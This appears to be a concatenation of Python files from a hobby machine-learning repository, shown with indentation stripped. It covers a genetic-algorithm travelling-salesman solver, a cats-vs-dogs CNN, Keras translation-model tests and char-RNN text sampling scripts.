for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+1 < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
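# quick sanity check (illustrative numbers, not part of the original script):
#   Fitness([City(0, 0), City(3, 4)]).distance() == 10   # 5 out and 5 back to the start
#   Fitness([City(0, 0), City(3, 4)]).fitness() == 0.1   # shorter routes => higher fitness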
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
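# mutate swaps city positions in place: with a high enough mutation_rate, a route like
# [A, B, C, D] might become [C, B, A, D] (positions 0 and 2 swapped); the set of cities
# is preserved, only the visiting order changes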
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img(fig):
"""
brief Convert a Matplotlib figure to a PIL Image in RGB format and return it
param fig a matplotlib figure
return a Python Imaging Library (PIL) image
"""
# put the figure pixmap into a numpy array
buf = fig2data(fig)
h, w, d = buf.shape
return Image.frombytes("RGB", (w, h), buf.tostring())
def fig2data(fig):
"""
brief Convert a Matplotlib figure to a 3D numpy array with RGB channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGB values
"""
# draw the renderer
fig.canvas.draw()
# get the RGB buffer from the figure (height x width x 3)
w, h = fig.canvas.get_width_height()
buf = numpy.fromstring(fig.canvas.tostring_rgb(), dtype=numpy.uint8)
buf.shape = (h, w, 3)
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rate
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'The returned tokenizer doesn\'t generate the same sequences as the tokenized sentences returned.'
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using the length argument returned incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12,501 (25,002 in total)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 4 blocks of two conv layers each (32, 64, 96, 128 filters), plus a 500-unit dense layer
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N iterations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
# character-to-integer mapping used during training (characters sorted by code point).
# NOTE: the printable ASCII part is reconstructed below; the original dictionary also
# mapped non-ASCII corpus characters to indices 98-192 (193 entries in total), but those
# characters were lost in extraction and are omitted here.
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '$': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, ';': 30, '<': 31, '=': 32, '>': 33, '?': 34, '@': 35,
'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '`': 67,
'a': 68, 'b': 69, 'c': 70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '~': 97, '\xad': 106}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
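# rough worked example (illustrative numbers): with preds = [0.1, 0.4, 0.2, 0.25, 0.05]
# and top_n = 2, all but the two largest entries are zeroed -> [0, 0.4, 0, 0.25, 0],
# renormalized to roughly [0, 0.62, 0, 0.38, 0], and the next character index is sampled
# from that distribution, so only the top-2 most likely characters can be picked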
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
# character-to-integer mapping used during training (characters sorted by code point).
# NOTE: the printable ASCII part is reconstructed below; the original dictionary also
# mapped non-ASCII corpus characters to indices 98-192 (193 entries in total), but those
# characters were lost in extraction and are omitted here.
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '$': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, ';': 30, '<': 31, '=': 32, '>': 33, '?': 34, '@': 35,
'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '`': 67,
'a': 68, 'b': 69, 'c': 70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '~': 97, '\xad': 106}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
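# Shape sketch (illustrative, with made-up sizes): for an encoded array of
# length 1000, batch_size=10 and n_steps=50 give 1000 // 500 = 2 batches.
# Each yielded x has shape (10, 50) and y is x shifted left by one step,
# i.e. y[:, :-1] == x[:, 1:]; the final column of the last batch is zero-padded.
# batches = get_batches(np.arange(1000), 10, 50)
# x, y = next(batches)  # x.shape == y.shape == (10, 50)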
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
